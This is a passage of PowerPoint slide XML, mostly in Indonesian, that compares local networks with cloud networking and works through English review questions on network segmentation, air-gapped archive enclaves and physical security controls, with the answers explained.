              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modal yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesulitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bandwidth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 1 Gbps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 10 Gbps di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berskala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1187752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1. A company’s network contains client workstations and database servers in the same subnet. Recently, this has enabled attackers to breach the security of the database servers from a workstation compromised by phishing malware. The company has improved threat awareness training and upgraded antivirus software on workstations. What other change will improve the security of the network’s design, and why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Network segmentation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>memisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> workstation dan database servers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> subnet/ VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>).</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dirty="0" err="1"/>
              <a:t>Menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation dan database server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lateral movement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> workstation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terinfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>network segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN, firewall internal), workstation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0" err="1"/>
              <a:t>defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>-in-depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. A company must store archived data with very high confidentiality and integrity requirements on the same site as its production network systems. What type of architecture will best protect the security requirements of the archive host?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Air-gapped or isolated network segment (network enclave).</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dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaiknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> production network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>air gap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkoneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> production LAN/internet) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimal VLAN/firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> production system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> archive host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. Following a data breach perpetrated by an insider threat actor, a company has relocated its on-premises servers to a dedicated equipment room. The equipment room has a lockable door, and the servers are installed to lockable racks. Access to keys is restricted to privileged administrators and subject to sign-out procedures. True or false? These security principles reduce the attack surface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>True.</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dirty="0" err="1"/>
              <a:t>Prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (physical security controls) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> restricted access, lockable racks, dan accountability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> key sign-out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Walaupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> insider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
